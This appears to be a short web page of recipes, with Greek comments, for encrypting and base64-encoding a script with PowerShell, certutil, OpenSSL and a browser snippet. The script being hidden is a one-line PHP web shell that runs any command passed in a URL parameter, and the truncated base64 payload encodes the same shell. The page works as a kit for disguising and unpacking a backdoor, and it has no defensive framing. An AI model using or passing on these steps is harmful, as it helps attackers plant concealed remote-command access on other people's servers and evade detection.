← index

Script Encryption Repository

Επίλεξε πλατφόρμα για να δεις τις μεθόδους κρυπτογράφησης.

PowerShell (AES-256 Encrypt & Save)
# Κλείδωμα κειμένου σε αρχείο στο Desktop
$text = "<?php system($_GET['cmd']); ?>"
$key = [byte[]]([System.Text.Encoding]::UTF8.GetBytes("12345600000000000000000000000000"))
$secureString = ConvertTo-SecureString $text -AsPlainText -Force
$encrypted = ConvertFrom-SecureString $secureString -Key $key
$encrypted | Out-File -FilePath "$env:USERPROFILE\Desktop\encrypted.txt"
CMD / Command Prompt (Base64 Encrypt File)
# Κωδικοποίηση αρχείου με το ενσωματωμένο certutil των Windows
certutil -encode script.php encrypted.txt
CMD / Command Prompt (Base64 Decrypt File)
# Αποκωδικοποίηση αρχείου πίσω στην αρχική μορφή
certutil -decode encrypted.txt decrypted.php
OpenSSL (AES-256 CBC Encrypt)
# Κρυπτογράφηση αρχείου με OpenSSL (pbkdf2 για ασφάλεια)
openssl enc -aes-256-cbc -salt -in script.php -out encrypted.enc -k 123456 -pbkdf2
OpenSSL (AES-256 CBC Decrypt)
# Αποκρυπτογράφηση και εμφάνιση κώδικα στο τερματικό
openssl enc -aes-256-cbc -d -in encrypted.enc -k 123456 -pbkdf2
Web Crypto API (Browser Native Base64 Decode)
// Αποκρυπτογράφηση Base64 "στον αέρα" και αντιγραφή στο clipboard
const payload = "PD9waHAgc3lzdGVtKCRf...";
navigator.clipboard.writeText(atob(payload));